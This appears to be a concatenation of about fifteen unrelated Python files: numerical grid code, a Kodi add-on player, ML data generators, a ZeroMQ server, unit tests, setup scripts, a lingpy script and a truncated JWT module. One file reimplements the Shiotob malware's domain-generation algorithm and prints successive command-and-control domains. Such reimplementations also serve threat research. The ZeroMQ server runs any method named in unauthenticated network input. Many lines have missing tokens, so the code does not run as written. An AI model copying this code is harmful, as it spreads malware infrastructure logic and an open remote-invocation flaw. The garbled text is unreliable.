Returns: :obj:`ndarray` of shape `(n_cells)` containing grid steps. Reference: Vinokur, Marcel, On One-Dimensional Stretching Functions for Finite-Difference Calculations, Journal of Computational Physics. 50, 215, 1983. Examples: >>> dyt = get_vinokur_grid_steps(14, 180, 5, two_sided_grid=True) >>> dyt [ 18.2451554 17.23915939 15.43744632 13.17358802 10.78720589 8.53852027 6.57892471 6.57892471 8.53852027 10.78720589 13.17358802 15.43744632 17.23915939 18.2451554 ] >>> dyt.sum() 180. >>> dyt = get_vinokur_grid_steps(14, 180, 5, upper_stepsize=10) >>> dyt [ 5.9818365 7.3645667 8.92544833 10.61326984 12.33841985 13.97292695 15.36197306 16.3485688 16.80714121 16.67536919 15.97141714 14.78881918 13.27136448 11.57887877 ] >>> dyt.sum() 180. """ if refine_towards not in ('upper', 'lower'): raise ValueError('refine_towards must be "upper" or "lower"') if two_sided_grid: if n_cells % 2: raise ValueError('number of grid points must be an even integer (given: {})'.format(n_cells)) n_cells = n_cells // 2 n_cells += 1 def approximate_sinc_inverse(y): """Approximate inverse of sin(y) / y""" if y < 0.26938972: inv = np.pi * (1 - y + y**2 - (1 + np.pi**2 / 6) * y**3 + 6.794732 * y**4 - 13.205501 * y**5 + 11.726095 * y**6) else: ybar = 1. - y inv = np.sqrt(6 * ybar) * (1 + .15 * ybar + 0.057321429 * ybar**2 + 0.048774238 * ybar**3 - 0.053337753 * ybar**4 + 0.075845134 * ybar**5) assert abs(1 - np.sin(inv) / inv / y) < 1e-2, 'precision error' return inv def approximate_sinhc_inverse(y): """Approximate inverse of sinh(y) / y""" if y < 2.7829681: ybar = y - 1. inv = np.sqrt(6 * ybar) * (1 - 0.15 * ybar + 0.057321429 * ybar**2 - 0.024907295 * ybar**3 + 0.0077424461 * ybar**4 - 0.0010794123 * ybar**5) else: v = np.log(y) w = 1. / y - 0.028527431 inv = v + (1 + 1. / v) * np.log(2 * v) - 0.02041793 + 0.24902722 * w + 1.9496443 * w**2 - 2.6294547 * w**3 + 8.56795911 * w**4 assert abs(1 - np.sinh(inv) / inv / y) < 1e-2, 'precision error' return inv target_sum = total_length if two_sided_grid: target_sum *= .5 s0 = float(target_sum) / float(lower_stepsize * n_cells) if upper_stepsize: s1 = float(target_sum) / float(upper_stepsize * n_cells) a, b = np.sqrt(s1 / s0), np.sqrt(s1 * s0) if b > 1: stretching_factor = approximate_sinhc_inverse(b) stretched_grid = .5 + .5 * np.tanh(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tanh(.5 * stretching_factor) else: stretching_factor = approximate_sinc_inverse(b) stretched_grid = .5 + .5 * np.tan(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tan(.5 * stretching_factor) stretched_grid = stretched_grid / (a + (1. - a) * stretched_grid) else: if s0 > 1: stretching_factor = approximate_sinhc_inverse(s0) * .5 stretched_grid = 1 + np.tanh(stretching_factor * np.linspace(0., 1., n_cells)) / np.tanh(stretching_factor) else: stretching_factor = approximate_sinc_inverse(s0) * .5 stretched_grid = 1 + np.tan(stretching_factor * np.linspace(0., 1., n_cells)) / np.tan(stretching_factor) stretched_grid_steps = np.diff(stretched_grid * target_sum) if refine_towards == 'upper': stretched_grid_steps = stretched_grid_steps[::-1] if two_sided_grid: stretched_grid_steps = np.concatenate((stretched_grid_steps[::-1], stretched_grid_steps)) assert abs(1 - np.sum(stretched_grid_steps) / total_length) < 1e-5, 'precision error' return stretched_grid_steps
import sys, os import json from traceback import print_exc from xbmcswift2 import xbmc, xbmcgui, xbmcplugin from meta import plugin from meta.gui import dialogs from meta.utils.executor import execute from import set_property from meta.utils.text import to_unicode, urlencode_path, apply_parameters, to_utf8 from import get_movie_from_library, get_episode_from_library from meta.navigation.base import get_icon_path, get_background_path from import get_players, patch from import get_channelers from import Lister from settings import * from language import get_string as _ @plugin.cached(TTL=60, cache="trakt") def get_trakt_ids(*args, **kwargs): try: from trakt import trakt return trakt.find_trakt_ids(*args, **kwargs) except: return None def active_players(media, filters={}): if media == "movies": setting = SETTING_MOVIES_ENABLED_PLAYERS elif media == "tvshows": setting = SETTING_TV_ENABLED_PLAYERS elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_PLAYERS elif media == "music": setting = SETTING_MUSIC_ENABLED_PLAYERS elif media == "live": setting = SETTING_LIVE_ENABLED_PLAYERS else: raise Exception("invalid parameter %s" % media) try: enabled = plugin.get_setting(setting, unicode) except: enabled = [] return [p for p in get_players(media, filters) if in enabled] def active_channelers(media, filters={}): if media == "movies": setting = SETTING_MOVIES_ENABLED_CHANNELERS elif media == "tvshows": setting = SETTING_TV_ENABLED_CHANNELERS elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_CHANNELERS elif media == "music": setting = SETTING_MUSIC_ENABLED_CHANNELERS elif media == "live": setting = SETTING_LIVE_ENABLED_CHANNELERS else: raise Exception("invalid parameter %s" % media) try: enabled = plugin.get_setting(setting, unicode) except: enabled = [] return [p for p in get_channelers(media, filters) if in enabled] def action_cancel(clear_playlist=True): if clear_playlist: xbmc.PlayList(xbmc.PLAYLIST_VIDEO).clear() plugin.set_resolved_url() xbmc.executebuiltin('Dialog.Close(okdialog, true)') def action_activate(link): xbmc.executebuiltin('Container.Update("%s")' % link) #action_cancel() def action_run(link): if link.startswith("plugin://"): xbmc.executebuiltin('RunPlugin(%s)' % link) else: xbmc.executebuiltin('RunScript(%s)' % link) def action_prerun(link): # xbmc.executebuiltin('ActivateWindow(10025,addons://user/,return)') if link.startswith("plugin://"): id = link.split("/") xbmc.executebuiltin('RunAddon(%s)' % id[2]) while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250) xbmc.sleep(250) xbmc.executebuiltin('Container.Update("%s")' % link) def action_play(item): #action_cancel() plugin.play_video(item) def action_playmedia(item): xbmc.executebuiltin('PlayMedia("%s")'%item) def action_resolve(item): #plugin.set_resolved_url(item) action_play(item) def get_video_link(players, params, mode, use_simple=False): lister = Lister() # Extend parameters for lang, lang_params in params.items(): for key, value in lang_params.items(): if isinstance(value, basestring): params[lang][key + "_+"] = value.replace(" ", "+") params[lang][key + "_-"] = value.replace(" ", "-") params[lang][key + "_escaped"] = value.replace(" ", "%2520") params[lang][key + "_escaped+"] = value.replace(" ", "%252B") pDialog = None selection = None try: if len(players) > 1 and use_simple: index ="Play using..."), [player.title for player in players]) if index == -1: return None players = [players[index]] resolve_f = lambda p : resolve_player(p, lister, params) if len(players) > 1: pool_size = plugin.get_setting(SETTING_POOL_SIZE, int) populator = lambda : execute(resolve_f, players, lister.stop_flag, pool_size) selection = dialogs.select_ext(_("Play using..."), populator, len(players)) else: result = resolve_f(players[0]) if result: title, links = result if len(links) == 1: selection = links[0] else: index ="Play using..."), [x['label'] for x in links]) if index > -1: selection = links[index] else: dialogs.ok(_("Error"), _("%s not found") % _("Video")) finally: lister.stop() return selection def on_play_video(mode, players, params, trakt_ids=None): if plugin.get_setting(SETTING_AUTOPATCH, bool) == True: patch("auto") assert players # Cancel resolve action_cancel() # Get video link use_simple_selector = plugin.get_setting(SETTING_USE_SIMPLE_SELECTOR, bool) is_extended = not (use_simple_selector or len(players) == 1) if not is_extended: xbmc.executebuiltin("ActivateWindow(busydialog)") try: selection = get_video_link(players, params, mode, use_simple_selector) finally: if not is_extended: xbmc.executebuiltin("Dialog.Close(busydialog)") if not selection: return # Get selection details link = selection['path'] action = selection.get('action', '')'Playing url: %s' % to_utf8(link)) # Activate link if action == "ACTIVATE": action_activate(link) elif action == "RUN": action_run(link) elif action == "PRERUN": action_prerun(link) elif action == "PLAYMEDIA": action_playmedia(link) elif action == "PRERUNRETURN": metaplayer().action_prerun(link) else: if trakt_ids: set_property('script.trakt.ids', json.dumps(trakt_ids)) return link return None def resolve_player(player, lister, params): results = [] for command_group in player.commands: if xbmc.abortRequested or not lister.is_active(): return command_group_results = [] for command in command_group: if xbmc.abortRequested or not lister.is_active(): return lang = command.get("language", "en") if not lang in params: continue parameters = params[lang] try: link = apply_parameters(to_unicode(command["link"]), parameters) except: print_exc() continue if link == "movies" and == "movies": video = get_movie_from_library(parameters['imdb']) if video: command_group_results.append(video) elif link == "tvshows" and == "tvshows": video = get_episode_from_library(parameters['id'], parameters['season'], parameters['episode']) if not video: video = get_episode_from_library(parameters['tmdb'], parameters['season'], parameters['episode']) if video: command_group_results.append(video) elif not command.get("steps"): command_group_results.append( { 'label': player.title, 'path': urlencode_path(link), 'action': command.get("action", "PLAY") } ) else: steps = [to_unicode(step) for step in command["steps"]] files, dirs = lister.get(link, steps, parameters) if command.get("action", "PLAY") == "ACTIVATE": files += dirs if files: command_group_results += [ { 'label': f['label'], 'path': player.postprocess(f['path']), 'action': command.get("action", "PLAY") } for f in files] if command_group_results: break results += command_group_results if results: return player.title, results class metaplayer(xbmc.Player): def __init__(self): xbmc.Player.__init__(self) self.returnlink = xbmc.getInfoLabel('Container.FolderPath') xbmc.log("returnlink: " + repr(self.returnlink), xbmc.LOGNOTICE) def action_prerun(self, link): # xbmc.executebuiltin('ActivateWindow(10025,addons://user/,return)') if link.startswith("plugin://"): id = link.split("/") xbmc.executebuiltin('RunAddon(%s)' % id[2]) while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250) xbmc.sleep(250) while xbmc.getInfoLabel('Container.PluginName') == id[2] and xbmc.getInfoLabel('Container.FolderPath') != "plugin://%s/" % id[2] and id[2] in xbmc.getInfoLabel('Container.FolderPath'): xbmc.sleep(250) if xbmc.getInfoLabel('Container.FolderPath') == "plugin://%s/" % id[2] or id[2] not in xbmc.getInfoLabel('Container.FolderPath'): break xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink) def onPlayBackEnded(self): xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink) def onPlayBackStopped(self): xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
import numpy as np from numpy import loadtxt as loadtxt from numpy import asarray as arr from numpy import asmatrix as mat from numpy import atleast_2d as twod from scipy.linalg import sqrtm ################################################################################ ## Methods for creating / sampling synthetic datasets ########################## ################################################################################ def data_gauss(N0, N1=None, mu0=arr([0, 0]), mu1=arr([1, 1]), sig0=np.eye(2), sig1=np.eye(2)): """Sample data from a two-component Gaussian mixture model. Args: N0 (int): Number of data to sample for class -1. N1 :(int) Number of data to sample for class 1. mu0 (arr): numpy array mu1 (arr): numpy array sig0 (arr): numpy array sig1 (arr): numpy array Returns: X (array): Array of sampled data Y (array): Array of class values that correspond to the data points in X. TODO: test more """ if not N1: N1 = N0 d1,d2 = twod(mu0).shape[1],twod(mu1).shape[1] if d1 != d2 or np.any(twod(sig0).shape != arr([d1, d1])) or np.any(twod(sig1).shape != arr([d1, d1])): raise ValueError('data_gauss: dimensions should agree') X0 =, d1), sqrtm(sig0)) X0 += np.ones((N0,1)) * mu0 Y0 = -np.ones(N0) X1 =, d1), sqrtm(sig1)) X1 += np.ones((N1,1)) * mu1 Y1 = np.ones(N1) X = np.row_stack((X0,X1)) Y = np.concatenate((Y0,Y1)) return X,Y def data_GMM(N, C, D=2, get_Z=False): """Sample data from a Gaussian mixture model. Builds a random GMM with C components and draws M data x^{(i)} from a mixture of Gaussians in D dimensions Args: N (int): Number of data to be drawn from a mixture of Gaussians. C (int): Number of clusters. D (int): Number of dimensions. get_Z (bool): If True, returns a an array indicating the cluster from which each data point was drawn. Returns: X (arr): N x D array of data. Z (arr): 1 x N array of cluster ids; returned also only if get_Z=True TODO: test more; N vs M """ C += 1 pi = np.zeros(C) for c in range(C): pi[c] = gamrand(10, 0.5) pi = pi / np.sum(pi) cpi = np.cumsum(pi) rho = np.random.rand(D, D) rho = rho + twod(rho).T rho = rho + D * np.eye(D) rho = sqrtm(rho) mu = mat(np.random.randn(c, D)) * mat(rho) ccov = [] for i in range(C): tmp = np.random.rand(D, D) tmp = tmp + tmp.T tmp = 0.5 * (tmp + D * np.eye(D)) ccov.append(sqrtm(tmp)) p = np.random.rand(N) Z = np.ones(N) for c in range(C - 1): Z[p > cpi[c]] = c Z = Z.astype(int) X = mu[Z,:] for c in range(C): X[Z == c,:] = X[Z == c,:] + mat(np.random.randn(np.sum(Z == c), D)) * mat(ccov[c]) if get_Z: return (arr(X),Z) else: return arr(X) def gamrand(alpha, lmbda): """Gamma(alpha, lmbda) generator using the Marsaglia and Tsang method Args: alpha (float): scalar lambda (float): scalar Returns: (float) : scalar TODO: test more """ # (algorithm 4.33). if alpha > 1: d = alpha - 1 / 3 c = 1 / np.sqrt(9 * d) flag = 1 while flag: Z = np.random.randn() if Z > -1 / c: V = (1 + c * Z)**3 U = np.random.rand() flag = np.log(U) > (0.5 * Z**2 + d - d * V + d * np.log(V)) return d * V / lmbda else: x = gamrand(alpha + 1, lmbda) return x * np.random.rand()**(1 / alpha) def data_mouse(): """Simple by-hand data generation using the GUI Opens a matplotlib plot window, and allows the user to specify points with the mouse. Each button is its own class (1,2,3); close the window when done creating data. Returns: X (arr): Mx2 array of data locations Y (arr): Mx1 array of labels (buttons) """ import matplotlib.pyplot as plt fig = plt.figure() ax = fig.add_subplot(111, xlim=(-1,2), ylim=(-1,2)) X = np.zeros( (0,2) ) Y = np.zeros( (0,) ) col = ['bs','gx','ro'] def on_click(event): X.resize( (X.shape[0]+1,X.shape[1]) ) X[-1,:] = [event.xdata,event.ydata] Y.resize( (Y.shape[0]+1,) ) Y[-1] = event.button ax.plot( event.xdata, event.ydata, col[event.button-1]) fig.canvas.draw() fig.canvas.mpl_connect('button_press_event',on_click) return X,Y
#coding:utf-8 import zmq import json context = zmq.Context() class Server(object): def __init__(self, port): self.server = context.socket(zmq.REP) self.server.bind("tcp://*:{0}".format(port)) def run(self): print "ready" while True: recv = self.server.recv() recv_dict = json.loads(recv) func = recv_dict['func'] arg = recv_dict['arg'] try: if arg: return_main = getattr(self, func)(*arg) else: return_main = getattr(self, func)() except Exception, ex: return_main = None return_error = str(ex) else: return_error = None finally: self.server.send(json.dumps({"main": return_main, "error":return_error})) class AsyncServer(object): def __init__(self, port): self.server = context.socket(zmq.PULL) self.server.bind("tcp://*:{0}".format(port)) def run(self): print "ready" while True: recv = self.server.recv() recv_dict = json.loads(recv) func = recv_dict['func'] arg = recv_dict['arg'] try: if arg: return_main = getattr(self, func)(*arg) else: return_main = getattr(self, func)() except Exception, ex: print ex
import argparse def get_next_domain(domain): qwerty = 'qwertyuiopasdfghjklzxcvbnm123945678' def sum_of_characters(domain): return sum([ord(d) for d in domain[:-3]]) sof = sum_of_characters(domain) ascii_codes = [ord(d) for d in domain] + 100*[0] old_hostname_length = len(domain) - 4 for i in range(0, 66): for j in range(0, 66): edi = j + i if edi < 65: p = (old_hostname_length * ascii_codes[j]) cl = p ^ ascii_codes[edi] ^ sof ascii_codes[edi] = cl & 0xFF """ calculate the new hostname length max: 255/16 = 15 min: 10 """ cx = ((ascii_codes[2]*old_hostname_length) ^ ascii_codes[0]) & 0xFF hostname_length = int(cx/16) # at most 15 if hostname_length < 10: hostname_length = old_hostname_length """ generate hostname """ for i in range(hostname_length): index = int(ascii_codes[i]/8) # max 31 --> last 3 chars of qwerty unreachable bl = ord(qwerty[index]) ascii_codes[i] = bl hostname = ''.join([chr(a) for a in ascii_codes[:hostname_length]]) """ append .net or .com (alternating) """ tld = '.com' if domain.endswith('.net') else '.net' domain = hostname + tld return domain if __name__=="__main__": """ example seed domain: """ parser = argparse.ArgumentParser(description="DGA of Shiotob") parser.add_argument("domain", help="initial domain") args = parser.parse_args() domain = args.domain for i in range(2001): print(domain) domain = get_next_domain(domain)
__docformat__ = "restructuredtext" class peekable: """Make an iterator peekable. This is implemented with an eye toward simplicity. On the downside, you can't do things like peek more than one item ahead in the iterator. On the bright side, it doesn't require anything from itertools, etc., so it's less likely to encounter strange bugs, which occassionally do happen. Example usage:: >>> numbers = peekable(range(6)) >>> 0 >>> 1 >>> numbers.peek() 2 >>> 2 >>> 3 >>> for i in numbers: ... print i ... 4 5 """ _None = () # Perhaps None is a valid value. def __init__(self, iterable): self._iterable = iter(iterable) self._buf = self._None def __iter__(self): return self def _is_empty(self): return self._buf is self._None def peek(self): """Peek at the next element. This may raise StopIteration. """ if self._is_empty(): self._buf = return self._buf def next(self): if self._is_empty(): return ret = self._buf self._buf = self._None return ret def groupbysorted(iterable, keyfunc=None): """This is a variation of itertools.groupby. The itertools.groupby iterator assumes that the input is not sorted but will fit in memory. This iterator has the same API, but assumes the opposite. Example usage:: >>> for (key, subiter) in groupbysorted( ... ((1, 1), (1, 2), (2, 1), (2, 3), (2, 9)), ... keyfunc=lambda row: row[0]): ... print "New key:", key ... for x in subiter: ... print "Row:", x ... New key: 1 Row: (1, 1) Row: (1, 2) New key: 2 Row: (2, 1) Row: (2, 3) Row: (2, 9) This requires the peekable class. See my comment here_. Note, you must completely iterate over each subiter or groupbysorted will get confused. .. _here: """ iterable = peekable(iterable) if not keyfunc: def keyfunc(x): return x def peekkey(): return keyfunc(iterable.peek()) def subiter(): while True: if peekkey() != currkey: break yield while True: currkey = peekkey() yield (currkey, subiter())
import threadly, time, random import unittest clf = 0 llf = 0 def callLF(lf): # print "CALLED" lf.setter(True) def listenFromFuture(): global llf # print "GotCalled" llf +=1 def callFromFuture(s): global clf # print "GotCalled", s clf +=1 def listenException(): raise Exception("TEST1") def callException(s): raise Exception("TEST1") class TestFutures(unittest.TestCase): def test_futureTest1(self): global clf, llf sch = threadly.Scheduler(10) LF1 = threadly.ListenableFuture() LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,)) LF2.add_listener(listenFromFuture) LF2.add_callable(callFromFuture) LF1.add_listener(listenFromFuture) LF1.add_callable(callFromFuture) self.assertTrue(LF1.get()) self.assertTrue(LF2.get()) self.assertEquals(2, llf) self.assertEquals(2, clf) LF2.add_listener(listenFromFuture) LF2.add_callable(callFromFuture) LF1.add_listener(listenFromFuture) LF1.add_callable(callFromFuture) self.assertEquals(4, llf) self.assertEquals(4, clf) sch.shutdown() def test_futureCallerExceptions(self): global clf, llf sch = threadly.Scheduler(10) LF1 = threadly.ListenableFuture() LF1.add_listener(listenException) LF1.add_listener(listenException) LF1.add_callable(callException) LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,)) self.assertTrue(LF1.get()) self.assertTrue(LF2.get()) sch.shutdown() def test_futureDoubleSet(self): global clf, llf sch = threadly.Scheduler(10) LF1 = threadly.ListenableFuture() LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,)) self.assertTrue(LF1.get()) self.assertTrue(LF2.get()) LF3 = sch.schedule_with_future(callLF, delay=100, args=(LF1,)) self.assertFalse(LF3.get()) self.assertEquals(10, sch.get_poolsize()) sch.shutdown() if __name__ == '__main__': unittest.main()
# Test methods with long descriptive names can omit docstrings # pylint: disable=missing-docstring import unittest import numpy as np from scipy.sparse import csr_matrix from import Table, Variable from Orange.preprocess.score import ANOVA, Gini, UnivariateLinearRegression, \ Chi2 from Orange.preprocess import SelectBestFeatures, Impute, RemoveNaNColumns, SelectRandomFeatures class TestFSS(unittest.TestCase): @classmethod def setUpClass(cls): cls.titanic = Table('titanic') = Table('wine') cls.iris = Table('iris') cls.auro_mpg = Table('auto-mpg') def setUp(self): Variable._clear_all_caches() def test_select_1(self): gini = Gini() s = SelectBestFeatures(method=gini, k=1) data2 = s(self.titanic) best = max((gini(self.titanic, f), f) for f in self.titanic.domain.attributes)[1] self.assertEqual(data2.domain.attributes[0], best) def test_select_threshold(self): anova = ANOVA() t = 30 data2 = SelectBestFeatures(method=anova, threshold=t)( self.assertTrue(all(anova(, f) >= t for f in data2.domain.attributes)) def test_error_when_using_regression_score_on_classification_data(self): s = SelectBestFeatures(method=UnivariateLinearRegression(), k=3) with self.assertRaises(ValueError): s( def test_discrete_scores_on_continuous_features(self): c = self.iris.columns for method in (Gini(), Chi2()): d1 = SelectBestFeatures(method=method)(self.iris) expected = \ (c.petal_length, c.petal_width, c.sepal_length, c.sepal_width) self.assertSequenceEqual(d1.domain.attributes, expected) scores = method(d1) self.assertEqual(len(scores), 4) score = method(d1, c.petal_length) self.assertIsInstance(score, float) def test_continuous_scores_on_discrete_features(self): data = Impute()(self.auro_mpg) with self.assertRaises(ValueError): UnivariateLinearRegression()(data) d1 = SelectBestFeatures(method=UnivariateLinearRegression())(data) self.assertEqual(len(d1.domain), len(data.domain)) def test_defaults(self): fs = SelectBestFeatures(k=3) data2 = fs(Impute()(self.auro_mpg)) self.assertTrue(all(a.is_continuous for a in data2.domain.attributes)) data2 = fs( self.assertTrue(all(a.is_continuous for a in data2.domain.attributes)) data2 = fs(self.titanic) self.assertTrue(all(a.is_discrete for a in data2.domain.attributes)) class TestRemoveNaNColumns(unittest.TestCase): def test_column_filtering(self): data = Table("iris") data.X[:, (1, 3)] = np.NaN new_data = RemoveNaNColumns()(data) self.assertEqual(len(new_data.domain.attributes), len(data.domain.attributes) - 2) data = Table("iris") data.X[0, 0] = np.NaN new_data = RemoveNaNColumns()(data) self.assertEqual(len(new_data.domain.attributes), len(data.domain.attributes)) def test_column_filtering_sparse(self): data = Table("iris") data.X = csr_matrix(data.X) new_data = RemoveNaNColumns()(data) self.assertEqual(data, new_data) class TestSelectRandomFeatures(unittest.TestCase): def test_select_random_features(self): data = Table("voting") for k_features, n_attributes in ((3, 3), (0.25, 4)): srf = SelectRandomFeatures(k=k_features) new_data = srf(data) self.assertEqual(len(new_data.domain.attributes), n_attributes)
#! /usr/bin/env python ############################################################################### ## ## GINKGO Biogeographical Evolution Simulator Post-Processing Library. ## ## Copyright 2009 Jeet Sukumaran and Mark T. Holder. ## ## This program is free software; you can redistribute it and#or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 3 of the License, or ## (at your option) any later version. ## ## This program is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License along ## with this program. If not, see <>. ## ############################################################################### """ Package setup and installation. """ import ez_setup ez_setup.use_setuptools() from setuptools import setup from setuptools import find_packages from ginkgo import PACKAGE_VERSION import sys import os import subprocess script_names = ['', ''] setup(name='Ginkgo', version=PACKAGE_VERSION, author='Jeet Sukumaran and Mark T. Holder', author_email=' and', url='', description="""\ A library to faciliate setting up runs and processing results of the GINKGO Biogeographical Evolution Simulator""", license='GPL 3+', packages=['ginkgo'], package_dir={'ginkgo': 'ginkgo'}, package_data={ "" : ['doc/*'], "ginkgo" : ["tests/data/*"] }, scripts = [('scripts/%s' % i) for i in script_names], test_suite = "ginkgo.tests", include_package_data=True, zip_safe=True, install_requires=[ "DendroPy >= 3.0.0", ], entry_points=""" # -*- Entry points: -*- """, long_description=open('README.txt', 'rU').read(), classifiers = [ "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "License :: OSI Approved :: GNU General Public License (GPL)", "Natural Language :: English", "Operating System :: OS Independent", "Programming Language :: Python", "Topic :: Scientific/Engineering :: Bio-Informatics", ], keywords='phylogenetics evolution biology biogeography', )
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2018-01-21 11:56 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ('core', '0012_auto_20180121_1155') ] operations = [ migrations.CreateModel( name='Extract', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('user_name', models.CharField(max_length=30, verbose_name='Name')), ('date', models.DateField(verbose_name='Date')), ('money', models.DecimalField(decimal_places=2, max_digits=12, verbose_name='Money')), ('description', models.CharField(max_length=70, verbose_name='Description')), ('category', models.CharField(max_length=70, verbose_name='Category')), ('payment', models.CharField(max_length=70, verbose_name='Payment')), ], options={ 'ordering': ['-date'], }, ), ] operations = [ migrations.SeparateDatabaseAndState(state_operations=operations) ]
from lib.sino import db import lingpyd as lingpy numbersup = '¹²³⁴⁵⁶⁰' numbersdown = '₁₂₃₄₅₆₀' for k in db: subgroup = db[k,'subgroup'] if subgroup == 'Bai': # modify tokens tks = db[k,'tokens'] if tks not in ['-','']: tks = tks.split(' ') ntk = [] while tks: tk = tks.pop(0) if tk[0] in numbersdown: for a,b in zip(numbersdown,numbersup): tk = tk.replace(a,b) ntk += [tk] # expand nasals elif "\u0303" in tk or tk[0] in "ãũẽĩõ": ntk += [tk,lingpy.rc('nasal_placeholder')] else: ntk += [tk] db[k][db.header['tokens']] = ' '.join(ntk) # same for ipa ipa = db[k,'ipa'] for a,b in zip(numbersdown, numbersup): ipa.replace(a,b) db[k][db.header['ipa']] = ipa db._clean_cache() # assemble cognate ids and align them again for bai alms = {} etd = db.get_etymdict(ref='cogid') for k in etd: print ("Carrying out alignment for {0}".format(k)) idxs = [idx[0] for idx in etd[k] if idx] nidxs, alms = [], [] for idx in idxs: alm = db[idx,'tokens'] sbg = db[idx,'subgroup'] if alm != '-' and alm and sbg=='Bai': nidxs += [idx] alms += [alm] if alms: msa = lingpy.Multiple(alms) msa.lib_align() for idx,alm in zip(nidxs,msa.alm_matrix): db[idx][db.header['alignment']] = ' '.join(alm) cidx = db._rowIdx ignore = [] for k in db: c = db[k, 'concept'] if c == 'to plant (grow)': db[k][cidx] = 'to plant' elif c == 'lie, rest': if db[k,'ipa'] == '-' or db[k,'ipa'] == '': ignore += [k] elif c == 'to the dream': db[k][cidx] = 'the dream' elif c == 'to suck': if db[k,'ipa'] == '-' or db[k,'ipa'] == '': db[k][cidx] = 'to lick' elif c == 'to work': db[k][cidx] = 'the work' # search for potential duplicates dups = {} for d in db.doculect: # get data flat idxs = db.get_list(doculect=d, flat=True) tks = db.get_list(doculect=d, flat=True, entry='tokens') # iterate over all tokens and search for identical words dup = {} for idx,tk in zip(idxs,tks): if tk not in ['-','']: try: dup[tk] += [idx] except KeyError: dup[tk] = [idx] for k in dup: if k not in ['-','']: if len(dup[k]) > 1: basei = dup[k][0] basec = db[basei,'concept'] base = '{0} ({1})'.format(basei, basec) for idx in dup[k][1:]: dups[idx] = base for k in db: if k not in dups: dups[k] = '' if db[k,'ipa'] == '0': db[k][db.header['ipa']] = '' db[k][db.header['tokens']] = '' db.add_entries('duplicates', dups, lambda x: x) # add line for duplicates db.update('sinotibetan',verbose=True, delete=ignore)
project euler/
def listprime(lp): prime=[True]*lp prime[0]=False prime[1]=False for x in range(lp): if prime[x]: bei=x+x while bei<lp: prime[bei]=False bei+=x return prime def replaceStar(s): result=[] if '*' in s: for n in range(0,9+1): news = s.replace('*', str(n)) if news[0]!='0': result.append(news) else: result.append(s) return result primes=listprime(10000000) def countPrime(list): result=[] for s in list: if primes[int(s)]: result.append(s) return result # print countPrime(replaceStar('56**3')) # print countPrime(replaceStar('*3')) def generate(g): if g==0: yield '' return for other in generate(g-1): for first in '1234567890*': yield first+other for x in generate(6): if len(countPrime(replaceStar(x)))==8: print countPrime(replaceStar(x))
from setuptools import setup, find_packages from os import path here = path.abspath(path.dirname(__file__)) long_description = """sweetmorse ---------- Morse code tools from read to write, analog to digital. .. image:: :target: Compatibility ------------- Targets Python3, tested against against Python 3.3-3.6. More info --------- See a crash course at """ setup( name='sweetmorse', # Versions should comply with PEP440. For a discussion on single-sourcing # the version across and the project code, see # version='1.1.0', description='Morse code tools from read to write, analog to digital', long_description=long_description, url='', author='Joel Sleppy', author_email='', license='MIT', # See classifiers=[ 'Development Status :: 1 - Planning', 'Intended Audience :: Developers', 'Topic :: Software Development :: Libraries', 'Topic :: Communications :: Ham Radio', 'Topic :: Multimedia :: Sound/Audio', # (should match "license" above) 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', ], keywords='morse signal electronics', # You can just specify the packages manually here if your project is # simple. Or you can use find_packages(). packages=find_packages(exclude=['tests']), # List run-time dependencies here. These will be installed by pip when # your project is installed. For an analysis of "install_requires" vs pip's # requirements files see: # install_requires=[], python_requires='~=3.0', package_data={}, data_files=[], entry_points={ 'console_scripts': [ 'sweetmorse = sweetmorse.main:main', ], }, )
from django.utils.translation import ugettext_lazy as _ from django.core.exceptions import ValidationError from rest_framework import authentication from rest_framework.exceptions import AuthenticationFailed from jwt.exceptions import TokenException from jwt import BaseToken, compare, token_factory from auth.models import UserProfile from authtoken.settings import api_settings, secret_key def get_token_instance(user_profile): return token_factory( api_settings.TOKEN_HEADER_CLAIMSET_CLASS, api_settings.TOKEN_PAYLOAD_CLAIMSET_CLASS, { 'payload': {'aud': api_settings.TOKEN_AUDIENCE or} } ) def validate_user(user): """Validates a user is active and can be used to authenticate. """ # From Django 1.10 onwards the `authenticate` call simply # returns `None` for is_active=False users. # (Assuming the default `ModelBackend` authentication backend.) if not user.is_active: raise ValidationError('User account is disabled.') def authenticate_credentials(kwargs): """ Returns a UserProfile object from the given kwargs if the UserProfile object exists and is valid. AuthTokenSerializer validates UserProfile object. """ try: user_profile = UserProfile.objects.get(**kwargs) except UserProfile.DoesNotExist: raise AuthenticationFailed('User non existant') try: validate_user(user_profile.user) except ValidationError as exc: raise AuthenticationFailed(_(str(exc))) return user_profile class JSONWebTokenAuthentication(authentication.BaseAuthentication): """ JSON Web Token based authentication conforming to RFC 7519. See and for more about JWTs. Clients should authenticate by passing the JWT token key in the "Authorization" HTTP header, prepended with the string "Bearer ". For example: Authorization: Bearer eyJhbGciO.eyJzdWIiOiIxMjM0NTY3ODkwIiwib.TJVA95OrM7E2cBab3 """ keyword = 'Bearer' www_authenticate_realm = 'api' def authenticate(self, request): """ Authenticate the 